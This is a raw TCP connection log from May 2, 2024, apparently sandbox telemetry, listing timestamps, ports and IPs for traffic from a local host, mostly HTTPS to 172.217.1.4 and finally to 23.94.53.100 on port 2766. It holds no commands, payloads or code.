May 2, 2024 04:56:04.310779095 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.310817957 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.310823917 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.320755005 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.320806026 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.320811987 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.320935011 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.320971966 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.320976973 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.326086044 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.326137066 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.326142073 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.331758976 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.331818104 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.331826925 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.338676929 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.338730097 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.338737011 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.343763113 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.343827963 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.343833923 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.343858957 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.343904018 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.348947048 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.354183912 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.354228020 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.354237080 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.359028101 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.359071970 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.359078884 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.363971949 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.364013910 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.364015102 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.364025116 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.364057064 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.368985891 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.373404980 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.373450041 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.373450994 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.373461962 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.373508930 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.373516083 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.375541925 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.377846003 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.382113934 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.382164001 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.382179022 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.386248112 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.386293888 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.386307955 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.390465021 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.390749931 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.390755892 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.394454002 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.394498110 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.394505024 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.396554947 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.396610022 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.396616936 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.400702953 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.400751114 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.400762081 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.404726982 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.404778957 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.404784918 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.407279015 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.407356977 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.407363892 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.409771919 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.409816027 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.409822941 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.412339926 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.412394047 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.412401915 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.414737940 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.414788961 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.414796114 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.417411089 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.417463064 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.417469978 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.419666052 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.419713974 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.419722080 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.422498941 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.422545910 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.422554016 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.422842979 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.424463034 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.426927090 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.426976919 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.426984072 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.429217100 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.429264069 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.429270983 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.430588007 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.430636883 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.430644035 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.432950974 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.433008909 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.433015108 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.433671951 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.435400963 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.437619925 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.437666893 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.437669039 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.437679052 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.437711000 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.439934015 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.442275047 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.442322969 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.442329884 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.444904089 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.444941998 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.444951057 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.444962025 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.445002079 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.446942091 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.449783087 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.449831009 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.449837923 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.451590061 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.451639891 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.451647043 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.453664064 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.453717947 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.453723907 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.455993891 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.456043959 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.456049919 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.459114075 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.459160089 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.459167004 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.461354017 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.461396933 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.461402893 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.462311983 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.462317944 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.463593006 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.463634014 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.463639975 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.465852976 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.465888977 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.465894938 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.468080997 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.468117952 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.468122959 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.470283031 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.470325947 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.470333099 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.472162962 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.472203016 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.472208023 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.472313881 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.472357988 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.476592064 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.476608038 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.660953999 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.661103964 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.872119904 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.872195959 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.900712967 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.948122025 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.044749975 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.044910908 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.044964075 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.242582083 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.242611885 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.243550062 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.243582010 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.243629932 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.248291969 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.248310089 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.478581905 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.618608952 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.618645906 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.619102001 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.641618013 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.641719103 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.641746998 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.657630920 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.657659054 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.657721996 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.684118032 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.729321003 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.729334116 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.788384914 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.788465023 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.788481951 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.788917065 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.788963079 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.788970947 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.794379950 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:05.794497013 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:05.964835882 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:06.172126055 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:06.172224045 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.584369898 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.584389925 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.584903002 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.618113041 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.618143082 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.618288040 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.652997017 CEST	49169	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.653084993 CEST	443	49169	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.792123079 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.792191029 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.840332985 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.840373039 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.840430021 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.895941973 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.896094084 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.896648884 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.896670103 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.897141933 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.897165060 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:09.897435904 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:09.940121889 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.126056910 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.126492977 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.126513004 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.126826048 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.127353907 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.127419949 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.127593040 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.132168055 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.172121048 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.328788996 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.519696951 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.519785881 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.519809961 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.520318031 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.521631956 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.782903910 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.783032894 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:10.783040047 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:10.783082008 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.249113083 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.249146938 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.250314951 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.250330925 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.250382900 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.252202034 CEST	49170	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.252221107 CEST	443	49170	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.252545118 CEST	49171	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.252577066 CEST	443	49171	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.253535032 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.253556013 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.253613949 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.255196095 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.255228043 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.255322933 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.264198065 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.264298916 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.264383078 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.264399052 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.264643908 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.264658928 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.264743090 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.264753103 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.467152119 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.497371912 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.497652054 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.497667074 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.497992039 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.498704910 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.498769999 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.499041080 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.500758886 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.501203060 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.501219988 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.501559019 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.502263069 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.502326012 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.502619028 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.540126085 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.544141054 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.730721951 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.730773926 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.730864048 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.730890036 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.731151104 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.731219053 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.738545895 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.738596916 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.738629103 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.738653898 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.738679886 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.738723040 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.738826990 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.738871098 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.738918066 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.836776972 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.836899996 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:11.836924076 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.837971926 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:11.838027000 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.257436037 CEST	49178	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.257458925 CEST	443	49178	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.258079052 CEST	49177	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.258102894 CEST	443	49177	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.270201921 CEST	49172	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.270241976 CEST	443	49172	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.458133936 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.458183050 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.458230019 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.656966925 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.656994104 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.827605963 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.827666998 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.827718973 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.887402058 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.887986898 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.888001919 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.888622046 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.890316010 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.890410900 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:13.891052961 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:13.932128906 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119246006 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119292021 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119318962 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119348049 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:14.119369030 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119410992 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:14.119421959 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119431973 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:14.119473934 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:14.128943920 CEST	49179	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:14.128966093 CEST	443	49179	172.217.1.4	192.168.2.22
May 2, 2024 04:56:58.617578030 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:58.617619038 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.373950005 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:03.374001980 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.374058962 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:03.375099897 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:03.375113010 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.603759050 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.604084015 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:03.604118109 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.604440928 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.604732037 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:03.604785919 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.812118053 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:03.812238932 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:10.624108076 CEST	49182	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:10.734004974 CEST	2766	49182	23.94.53.100	192.168.2.22
May 2, 2024 04:57:10.734091997 CEST	49182	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:10.741106987 CEST	49182	2766	192.168.2.22	23.94.53.100
